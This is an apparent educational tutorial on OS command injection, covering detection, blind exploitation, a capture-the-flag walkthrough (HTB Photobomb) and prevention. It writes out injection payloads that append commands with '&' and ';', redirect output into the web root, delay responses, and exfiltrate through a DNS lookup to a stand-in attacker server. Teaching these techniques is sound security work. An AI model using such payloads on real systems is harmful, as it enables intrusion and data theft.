What is OS Command Injection?#
This type of command injection allows attackers to execute system commands on the server that is running the vulnerable application.
Often times, an attacker can leverage this type of vulnerability to compromise other parts of the hosting infrastructure and the adjacent file system.
Injecting OS Commands#
Imagine a website that lets you see if a local retailer has a certain item in stock and it gets this information using this URL:
https://vulnerable.com/inStock?=productId=23&locationId=6
To provide this information, the application needs to query a few legacy systems using some shell commands like this:
productstock.pl 23 6
This program then outputs the status of an item’s stock at the specified location and returns it to the user.
This application doesn’t implement any defenses against OS command injection, so the attacker could change the productId parameter in the URL to affect the command that is run.
For example if we placed this:
& echo hackertest &
In the URL like this:
https://vulnerable.com/inStock?=productId=echo+hackertest&locationId=6
The productstock.pl program from earlier might execute this command and return an error:
Error - productID was not provided
hackertest
6: command not found
Useful Commands#
After you identify an OS command injection vulnerability, you might want to try some more commands that could give you some information about the underlying system:
| Purpose | Linux | Windows |
|---|---|---|
| Name of current user | whoami | whoami |
| Operating System | uname -a | ver |
| Network Config | ifconfig | ipconfig /all |
| Network Connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |
Blind OS Command Injection Vulnerabilities#
Most of the time, you probably won’t be able to see the raw output of the program you are injecting commands into. These can still be exploited, but we will need to be a bit more observant when looking for them.
Imagine a web application that has developer-maintained programs and you can leave feedback so long as you provide an email address. The server-side application sends an email to the developer of that program containing the feedback like this:
mail -s "Line 47 is bugged bro." -aFrom:kevin@mail.com developer@mail.com
The mail program doesn’t return any output, so injecting echo something like before wouldn’t help us here.
Detecting Blind OS Command Injection via Time Delays#
If we inject some command that increases the time it will take to receive the HTTP response, we could determine if our injection worked.
For example if we inject:
& ping -c 10 127.0.0.1 &
This would send 10 ICMP packets, making the response take longer to get back.
Exploit Blind OS Command Injection by Redirecting Output#
If you can navigate freely through the web applications directory, you might be able to write a file into the web root like this:
& whoami > /var/www/static/whoami.txt &
This command would send the output of the whoami command to the whoami.txt file which, in this case, is something we can navigate to and view from the site by fetching http://vulnerable.com/whoami.txt.
Exploit Blind OS Command Injection using Out-Of-Band Techniques#
You might be able to inject a command that can call out to a server that you monitor like this:
& nslookup your-attacker-server.com &
This would cause a DNS lookup for your domain, which you could view on the administrative end. This is also an easy way to exfiltrate the output of commands.
OS Command Injection Characters#
You’ll just need a list of command separators. So far we have been using & almost exclusively, but there are many others like |, ;, \n, and so on.
You can see a list of them on a GitHub repo here.
Quiz (HTB Photobomb)#
This is an easy difficulty Linux box that has us use OS command injection to get a reverse shell.
On the site we are able to go the /printer endpoint if we are logged in, if you inspect the page source you’ll find cleartext credentials in one of the JavaScript files referenced.
We can capture a POST request to /printer and it looks something like this when downloading an image:
The web application seems to use this request data to fetch the picture. We can try to inject commands in all of these parameters but we are met with 500 - Internal Server Error each time.
If we modify the filetype parameter to be jpg;sleep+10, we notice that the page takes much longer to respond, indicating that the command is being executed.
We could have this get a reverse shell from our machine to compromise the www-data user.
Preventing OS Command Injection#
Ideally you avoid taking user-supplied input all together and avoid using inputs that users can manipulate.
If you are unable to make those adjustments though, you need to implement strong and robust input validation:
- Validate user inputs against a whitelist
- Validate the input is a certain data type
- Validate the types of characters that are allowed to be used